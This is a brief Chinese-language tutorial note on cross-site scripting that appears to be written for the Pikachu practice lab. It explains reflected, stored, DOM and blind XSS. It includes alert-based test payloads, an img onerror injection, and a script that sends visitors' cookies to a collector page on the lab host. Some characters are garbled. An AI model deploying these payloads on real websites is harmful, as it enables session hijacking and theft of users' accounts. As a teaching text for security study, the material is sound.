介紹

XSS，即跨站腳本攻擊，是指攻擊者利用Web服務器中的代碼漏洞，在頁面中嵌入客戶端腳本（通常是一段由JavaScript編寫的惡意代碼），當信任此Web服務器的用戶訪問
Web站點中含有惡意腳本代碼的頁面，用戶瀏覽器會自動加載并執行該惡意代碼，從而達到攻擊的目的。

XSS分類一般如下：

1.反射型XSS
2.存儲型XSS
3.DOM型XSS

1.反射型XSS,非持久性XSS

alert(document.cookie) //彈出當前cookie

2.存儲型XSS,持久性XSS,JS代碼會存在后臺

3.DOM型XSS也是一種反射型，但是輸入的語句不是JS的語句，是DOM語法?

?

'"><img οnerrοr=alert(0) src=><"'

利用XSS進行攻擊:

攻擊方：

找到存儲cookie的url：http://localhost/pikachu/pkxss/xssmanager.php/xcookie/cookie.php

?

編輯攻擊代碼：

<script>
document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
? ? </script>

用戶訪問留言板，攻擊方就收集到用戶的cookie 了

4.XSS盲打

攻擊的注入點（用戶提交數據的頁面）和顯示點（管理員查看數據的頁面）不同。

輸入的內容不會在前端輸出，而是提交到了后臺。

管理員登錄后臺管理界面，可能遭受到XSS攻擊。

5.XSS過濾

<script>

? ? alert(document.cookie)

</script>